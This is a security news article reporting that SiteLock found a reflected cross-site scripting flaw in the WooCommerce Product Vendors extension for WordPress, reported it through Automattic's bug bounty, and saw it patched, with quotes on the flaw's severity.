Reflected XSS Vulnerability in WordPress WooCommerce Patched


Security vendor SiteLock today revealed that it found a vulnerability in the WooCommerce WordPress module, which has now been patched.

"The vulnerability was found in the Product Vendors extension to the WooCommerce plugin for WordPress, which is developed by WooCommerce themselves," Logan Kipp, Wordpress Evangelist at SiteLock, told eSecurityPlanet.

WooCommerce is a widely deployed ecommerce theme and plugin platform for WordPress. Back in May 2015, Automattic, the lead commercial sponsor behind the open-source WordPress content management system, acquired WooCommerce and has been evolving the platform ever since.

The vulnerability that SiteLock found is what is known as a Reflected Cross Site Scripting (XSS) flaw. In a reflected XSS, a browser can potentially be exploited by code injected third-party, typically due to a lack of proper code validation and input sanitation.

Ramuel Gall, senior security analyst at Sitelock, reported the XSS issue to Automattic via the company' bug bounty program, which is operated by Hackerone.

"Version 2.0.27 of the WooCommerce Product Vendors plugin doesn't appear to correctly escape the "vendor description" POST parameter and can be manipulated to reflect arbitrary scripting," Gall wrote in his submission to Automattic on July 25.

Kipp noted that the vulnerability was discovered by SiteLock's automated XSS scanner that is included in various tiers of SiteLock's services during a routine scan of a customer's website.

"We scan millions of customers' websites daily for malware or vulnerabilities, which includes an extremely broad variety of applications," Kipp said. "Which applications are scanned will depend on which applications are present on customers' websites."

Automattic only gave the issue a low level two severity score, though Kipp noted that the impact should not be under-stated. He explained that the risk level is rated at Low 2 because by itself a reflective XSS vulnerability does not explicitly allow access to any sensitive data, vulnerabilities like these are more commonly used as a tool to execute a larger attack.

"The impact of an attack through exploitation of this vector is chiefly limited by the imagination of the adversary," Kipp said. "Through a combination of exploiting this vulnerability and some light social engineering, the impact could become quite substantial."

"It would be a mistake to discount the risk involved with this vulnerability," he added.

Sean Michael Kerner is a senior editor at eSecurityPlanet and Follow him on Twitter @TechJournalist.